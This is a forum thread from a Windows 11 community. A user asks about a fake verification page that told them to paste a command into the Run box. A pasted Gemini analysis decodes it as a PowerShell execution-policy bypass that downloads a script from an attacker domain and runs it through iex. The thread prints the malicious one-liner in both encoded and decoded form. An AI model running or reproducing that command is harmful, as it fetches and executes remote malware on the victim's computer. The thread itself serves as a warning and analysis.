Windows 11

1081 readers

1 users here now

Welcome to the community for Windows 11, Microsoft's latest computer operating system.

Rules:

Do not promote pirated content or grey market keys.
Be civil. No rude, offensive, or hateful posts/comments.

founded 2 years ago

MODERATORS

uidev@lemmy.world

What does this command do that this website wants me to "verify" myself by running in the run window? (sh.itjust.works)

submitted 2 weeks ago* (last edited 2 weeks ago) by StarvingMartist@sh.itjust.works to c/windows11@lemmy.world

20 comments fedilink hide all child comments

Yeah don't put this in but can anyone give me an idea of what they were trying to do? the website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real pc verification screen to try to get me to put this in Run

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

you are viewing a single comment's thread
view the rest of the comments

[–] Pyro@pawb.social 9 points 2 weeks ago* (last edited 2 weeks ago) (18 children)

One of the moments that Ai can be good. I asked googled gemni

This command is highly malicious and is designed to execute a script downloaded from a remote server. Here's a breakdown of what each part does:

conhost cmd /c: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it's being used as a wrapper.

powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: This is the core malicious part.

powershell: Invokes the PowerShell interpreter.

/ep bypass: This is crucial. /ep stands for "execution policy." bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.

/e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: The /e switch indicates that the following string is an encoded command. The string JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA== is a Base64 encoded string. Let's decode the Base64 string to see the actual PowerShell command: Decoded PowerShell command: $site = Invoke-RestMethod 'https: //mastraw.top/me/day'; iex $site Now we can fully understand the malicious intent:

$site = Invoke-RestMethod '# https: //mastraw.top/me/day': This command uses Invoke-RestMethod to download content from the URL 'https://mastraw/. top/me/day' . This URL is likely hosting a malicious PowerShell script or some other form of executable code.

; iex $site: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from 'https://mastraw.top/. /me/day' (which is stored in the $site variable) and executes it directly as a PowerShell command. In summary, this command is designed to:

Bypass PowerShell's security restrictions.

Download a script from a specific remote website '(https. ://mastraw.top/me/day)' .

Immediately execute that downloaded script on the victim's computer. The content of the script downloaded from' https :// mastraw.top/me/day' is unknown without accessing that URL, but given the nature of this command, it's almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.

Edit:added back tick to urls

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago (14 children)

You needed an LLM to figure out this was malware?! Sweet jesus, we're well and truly fucked.

[–] otter@lemmy.ca 3 points 2 weeks ago* (last edited 2 weeks ago) (4 children)

It did speed up the process of looking it up and confirming that it is malware.

LLMs are decent at pattern recognition, and so it pulled up relevant keywords associated with each part of the command. You can then look up the important section to verify. It's also something that a simple and locally hosted LLM could do.

I wouldn't run a random command, but confirming that it is malware would let me take further action to block the site / report it / help a family member that already ran the command

[–] geekwithsoul@lemm.ee 1 points 2 weeks ago (1 children)

Or you can just know that if some rando site is asking you to run cmd and powershell as some sort of authentication scheme, you're about to get your shit fucked up. The specifics literally don't matter, this is behavior no legit site would request you to do.

[–] otter@lemmy.ca 4 points 2 weeks ago (1 children)

That's enough for me to not run it, but proving it can be helpful in some contexts, such as this thread.

"This is malware because no legit site would authenticate like that" vs. "this is malware, it will do XYZ"

[–] geekwithsoul@lemm.ee 0 points 2 weeks ago* (last edited 2 weeks ago) (1 children)

Okay but pretty much any malware is going to follow those same steps - they're what makes it malware. The LLM doesn't "prove" anything - it's not examining the executable, it's not setting up a VM and doing deep packet analysis to see how the malware operates. It's just parroting back the fact this is malware with details seeded from the prompt. This is like yelling into a canyon and "proving" someone is stuck in the canyon and yelling because you heard an echo.

No one should be using an LLM as a security backstop. It's only going to catch the things that have already been seen before, and the minute a bad actor introduces something the least bit novel in the attack, the LLM is confidently going to say it isn't malware because it hasn't seen it before. A simple web search would have turned up essentially the same information and used only a small fraction of the resources.

[–] otter@lemmy.ca 4 points 2 weeks ago

That's not what I meant though, I said that it speeds up the process of looking it up. It's about as good as an unreliable peer that tells you what it thinks is happening. I can then research it myself based on the keywords that it mentions.

It is similar to a web search, but with how bad search results are these days (a large part because of other people making LLM generated garbage articles), I find that asking a locally hosted LLM will give me a better starting point. Since it's running on my own simple hardware, I'm not as worried about the resource cost compared to the tech companies' ones.

I agree with everything else you've said though

load more comments (2 replies)

load more comments (11 replies)

load more comments (14 replies)